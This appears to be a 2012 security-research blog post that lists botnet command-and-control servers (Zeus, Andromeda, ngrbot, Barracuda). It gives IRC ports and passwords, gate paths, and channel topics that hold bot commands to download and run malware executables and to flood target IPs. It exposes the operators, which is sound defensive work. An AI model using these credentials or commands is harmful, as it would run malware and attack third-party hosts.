199.119.226.75 (Barracuda irc botnet hosted by France Paris Dnsslave.com)

Server: 199.119.226.75
Port: 6667
Channel: #Aryan
Oper:
[Paradoxun] (Paradoxun@rofl12345): …
[Paradoxun] ~#Aryan
[Paradoxun] 199.119.226.75 :Lee’s
[Paradoxun] idle 00:03:03, signon: Sat Nov 24 13:31:20
[Paradoxun] End of WHOIS list.

You may remember Paradoxun from here or here. It looks like he may have some aryan bots in the channel as well.

Paradoxun .botkill -s Paradoxun

f0001.info (ngrbot irc botnet hosted by United States Chicago Steadfast Networks)

Resolved f0001.info to 208.117.34.204, 208.117.34.20

Server: f0001.info
Port: 1887
Server password: leonis
Channel: #pool
Channel password: leonis
* Topic for #pool is: ~pu hxxp://hotfile.com/dl/180565282/bc43943/queriendo.exe 3ea04ecdc19fad85fdf2eb15ba20cc9a ~s -o ~s
* Topic for #pool set by google at Fri Nov 23 10:26:12 2012
Channel: #XP
* Topic for #xp is: ~dw hxxp://hotfile.com/dl/180565391/ee7fa0b/ccc.exe 55c6bf0eac7a786de324c7f34ef6db12 ~dw hxxp://hotfile.com/dl/180565492/0dd28c1/10.exe ee2dcac3f9f630c69dd750cc6abc5b8a
*

apocsvr.info (Andromeda http malware hosted by vHostLayer.com)

Server: apocsvr.info
Gate file: /andro/image.php

This is just the standard cracked andro, but I noticed something interesting about it. The domain is WhoisGuard protected, which is often used by skids who don’t want to spend 30 seconds making up fake info for the whois. However, I noticed something in the assembly info of the

smartnet.taess.net (Zeus banking malware and other crap hosted by Germany Frankfurt Am Main Ovh Gmbh)

Resolved smartnet.taess.net to 94.23.160.203

Zeus
Server: smartnet.taess.net
Gate file: smartnet.taess.net/directory/gate.php
Config file: smartnet.taess.net/directory/config.bin

Hosting Zeus on a free host seems like a great idea.

Bonus “secure soft” bot from the same guy
Server: lagner.taess.net
Gate file: /Vote%20Gateway%20%20%20blabla%20%20%20Metin2%20P-Server%20Liste_files/Admin/acces/update/connect.php

He was using this to DDoS Israeli sites during the Gaza bombardment. Germany strikes again.

Stats panel

37.221.171.139 (ngr irc botnet hosted by Germany Frankfurt Am Main Voxility S.r.l.)

Server: 37.221.171.139
Port: 1234
Server password: secret
Channel: #nigg
Channel password: secret
Topic for #nigg is: .slow 80.82.64.21 80 .slow 77.81.243.156 80 .slow 199.59.166.134 80 .slow 77.81.243.156 80
Topic for #nigg set by pb at Wed Nov 21 14:38:45 2012
Oper: pb!abuse@boss

Checking out the IPs, it looks like he is attacking carding/dumps websites
swiped.su

Multiple barracuda http bots hosted by Russian Federation Moscow Pallada Web Service Llc

This is the new IP of Tropical Paradise’s shared hosting for his shitty .NET HTTP bot.

Domain: anet.h4ck.me
Gate file: /endless14/bot.php

Domain: deamonscentral.no-ip.info
Gate file: /phpadmin141/bot.php

Domain: fofogogo23http.no-ip.biz
Gate file: /liquified61/bot.php

Domain: barracudasecurity.tk
Gate file: bot.php

It looks like he’s finally figured out that leaving the panel in the root directory is a bad